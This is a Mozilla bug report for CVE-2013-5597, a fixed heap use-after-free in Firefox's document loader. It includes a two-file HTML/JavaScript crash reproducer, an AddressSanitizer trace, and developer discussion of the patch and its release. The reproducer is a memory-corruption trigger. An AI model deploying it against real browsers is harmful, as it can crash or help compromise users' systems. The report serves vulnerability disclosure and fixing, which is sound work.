Last Comment Bug 918864 - (CVE-2013-5597) [FIX] Heap-use-after-free in nsDocLoader::doStopDocumentLoad()
(CVE-2013-5597)
: [FIX] Heap-use-after-free in nsDocLoader::doStopDocumentLoad()
Status: RESOLVED FIXED
[asan][adv-main25+][adv-esr1710+][adv...
: csectype-uaf, regression, sec-critical
Product: Core
Classification: Components
Component: DOM (show other bugs)
: Trunk
: x86_64 Linux
: -- normal (vote)
: mozilla27
Assigned To: Olli Pettay [:smaug]
:
Mentors:
Depends on:
Blocks: 471227
  Show dependency treegraph
 
Reported: 2013-09-20 09:03 PDT by lifeasageek
Modified: 2015-02-25 20:16 PST (History)
12 users (show)
abillings: sec‑bounty+
cbook: in‑testsuite?
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---
wontfix
+
verified
+
verified
+
verified
+
verified
+
verified
+
fixed
fixed
fixed


Attachments
patch (2.91 KB, patch)
2013-09-26 17:13 PDT, Olli Pettay [:smaug]
bzbarsky: review+
abillings: approval‑mozilla‑aurora+
abillings: approval‑mozilla‑beta+
abillings: approval‑mozilla‑esr24+
abillings: sec‑approval+
Details | Diff | Splinter Review

Description lifeasageek 2013-09-20 09:03:25 PDT
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36

Steps to reproduce:

Heap-use-after-free in nsDocLoader::doStopDocumentLoad().
Tested on asan firefox build (1377823661 and 1379548174) and 23.0 (crashed).
OS : Debian 7.1 and Ubuntu 10.04 LTS

Please put a.html and b.html in the same directory, and open a.html.


=== a.html ===
<html>                                                                                                                                                                  
<script>                                                                                                                                                                
function killChildFrame() {                                                                                                                                             
    window[0].home();                                                                                                                                                   
    document.body.removeChild(document.getElementsByTagName('iframe')[0]);                                                                                              
}                                                                                                                                                                       
</script>                                                                                                                                                               
<iframe src="b.html"></iframe>                                                                                                                                          
</html>                                                                                                                                                                 

=== b.html ===
<html manifest="x">                                                                                                                                                     
<script>                                                                                                                                                                
window.applicationCache.onchecking = function() {                                                                                                                       
    parent.killChildFrame();                                                                                                                                            
}                                                                                                                                                                                                                                                                                                                        
</script>                                                                                                                                                               
</html>                                                                                                                                                                 



Actual results:

==18678==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060009b8100 at pc 0x7f3781adb4e0 bp 0x7fff04361db0 sp 0x7fff04361da8
READ of size 8 at 0x6060009b8100 thread T0
    #0 0x7f3781adb4df in ~nsCOMPtr /dist/include/nsCOMPtr.h:430
    #1 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #2 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #3 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #4 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #5 0x7f377f3b4106 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/netwerk/base/src/nsLoadGroup.cpp:687
    #6 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #7 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #8 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #9 0x7f37804e53bc in nsRunnableMethodImpl<void (nsDocument::*)(), true>::Run() /dist/include/nsThreadUtils.h:363
    #10 0x7f37836d4ba9 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThread.cpp:622
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
0x6060009b8100 is located 0 bytes inside of 64-byte region [0x6060009b8100,0x6060009b8140)
freed by thread T0 here:
    #0 0x446015 in __interceptor_free _asan_rtl_
    #1 0x7f3781b4791d in nsAutoRefCnt::operator=(unsigned int) /dist/include/mozilla/mozalloc.h:225
    #2 0x7f3781adb34f in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:1331
    #3 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #4 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #5 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #6 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #7 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #8 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #9 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #10 0x7f37804e53bc in nsRunnableMethodImpl<void (nsDocument::*)(), true>::Run() /dist/include/nsThreadUtils.h:363
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #28 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #29 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
previously allocated by thread T0 here:
    #0 0x446155 in __interceptor_malloc _asan_rtl_
    #1 0x7f378865b5c8 in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f37803d493e in nsContentSink::ProcessOfflineManifest(nsAString_internal const&) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsContentSink.cpp:1108
    #3 0x7f378127360b in nsHtml5SpeculativeLoad::Perform(nsHtml5TreeOpExecutor*) /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5SpeculativeLoad.cpp:45
    #4 0x7f37813095f7 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5TreeOpExecutor.cpp:507
    #5 0x7f3781283288 in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5StreamParser.cpp:131
    #6 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #7 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #8 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #9 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #10 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #11 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #12 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #13 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #14 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #15 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #16 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #17 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #18 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #19 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #20 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #21 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #22 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #23 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #24 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #25 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #26 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #27 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #28 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #29 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
Shadow bytes around the buggy address:
  0x0c0c8012efd0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8012efe0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c8012eff0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c8012f000: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8012f010: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=>0x0c0c8012f020:[fd]fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x0c0c8012f030: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c8012f040: fa fa fa fa 00 00 00 00 00 00 05 fa fa fa fa fa
  0x0c0c8012f050: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00
  0x0c0c8012f060: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8012f070: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==18678==ABORTING
Comment 1 Andrew McCreight [:mccr8] 2013-09-23 09:35:18 PDT
I'll take a first look at this.
Comment 2 lifeasageek 2013-09-23 10:19:05 PDT
Andrew@ Thanks. Please let me know if there's anything that I can help you.
Comment 3 Andrew McCreight [:mccr8] 2013-09-24 09:32:17 PDT
I wasn't able to reproduce this on trunk.  I'll try again.
Comment 4 Al Billings [:abillings] 2013-09-25 10:19:36 PDT
Matt, can you try reproducing this in a current ASAN build?
Comment 5 Daniel Veditz [:dveditz] 2013-09-25 10:21:47 PDT
on the face of it this looks sec-critical if we can confirm it still happens.
Comment 6 lifeasageek 2013-09-25 11:45:15 PDT
Just tested on the lasted asan build (https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1380106412/) and it triggered use-after-free with the same crash footage.
Comment 7 Olli Pettay [:smaug] 2013-09-25 15:04:50 PDT
Does one need to load the testcase from a server or should a local file be ok?
Comment 8 Olli Pettay [:smaug] 2013-09-25 15:07:56 PDT
Looks like from server is needed. I have this in debugger.
Comment 9 Olli Pettay [:smaug] 2013-09-26 17:13:20 PDT
Created attachment 810872 [details] [diff] [review]
patch

this is a regression from bug 471227, so rather old.

We end up calling nsOfflineCachePendingUpdate::OnStateChange nestedly, so that
mService->Schedule calls it again. The object is kept alive on stack, but
since NS_RELEASE_THIS() is called more than once, calling Release when
the strong pointer on the stack goes away crashes.

Couldn't figure out anything simpler given the odd refcnt handling.

(I think nsDocLoader should just keep this kind of webprogresslisteners alive in a
strong array, but that would require quite a bit more changes and wouldn't be
safe enough for branches.)
Comment 10 Boris Zbarsky [:bz] 2013-09-26 18:20:41 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

r=me
Comment 11 Olli Pettay [:smaug] 2013-09-26 18:31:01 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

[Approval Request Comment]
Bug caused by (feature/regressing bug #): bug 471227
User impact if declined: Crashes
Testing completed (on m-c, etc.): NA 
Risk to taking this patch (and alternatives if risky): Should be very safe. Adding a flag that we don't do a thing twice 
String or IDL/UUID changes made by this patch: NA

How easily could an exploit be constructed based on the patch?
Note sure about the exploit but crash might be quite easy to get.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Unfortunately the patch is very clear what kind of problem this is about.

Which older supported branches are affected by this flaw?
all

Do you have backports for the affected branches?
The patch seems to apply cleanly to branches

How likely is this patch to cause regressions; how much testing does it need?
Should be very safe.

So, in other words, I think this could land as late as possible of a cycle.
Comment 12 Al Billings [:abillings] 2013-09-27 10:14:13 PDT
I have no problems sec-approval+'ing this but I want release management to weigh in since we'll need to take this on Aurora and Beta (and ESR24 and maybe ESR17, which is still supported). What I need from them specifically is how late they are comfortable checking this in since it clearly demonstrates the issue. Since this is a safe fix, it shouldn't affect stability really.

I assuming B2G is affected too.
Comment 13 Lukas Blakk [:lsblakk] use ?needinfo 2013-09-27 11:50:30 PDT
We should be able to land this on 10/17 to get it into our second-to-last Beta (and then elsewhere too) to minimize exposure but also give one extra release's buffer if we needed to backout for any reason - though this is expected to be safe.
Comment 14 Al Billings [:abillings] 2013-09-27 12:23:47 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

Setting unset branch approval flags and giving sec-approval+.

We should take this on ESR17 too if the patch applies since we are still supporting that for another two releases.
Comment 16 Ryan VanderMeulen [:RyanVM] 2013-10-17 11:01:05 PDT
https://hg.mozilla.org/integration/mozilla-inbound/rev/e0daf4f7c665
Comment 19 Carsten Book [:Tomcat] 2013-10-18 03:42:10 PDT
https://hg.mozilla.org/mozilla-central/rev/e0daf4f7c665
Comment 20 Matt Wobensmith [:mwobensmith][:matt:] 2013-10-21 17:06:20 PDT
Confirmed crash on pre-patch ASan FF27.
Verified fixed on ASan builds of 24esr, 25, 26 and 27, 2013-10-21.

Can't build ASan 17esr at the moment, will verify that in a day or two.
Comment 21 Matt Wobensmith [:mwobensmith][:matt:] 2013-10-23 11:37:43 PDT
Verified 17esr, 2013-10-23.

Note You need to log in before you can comment on or make changes to this bug.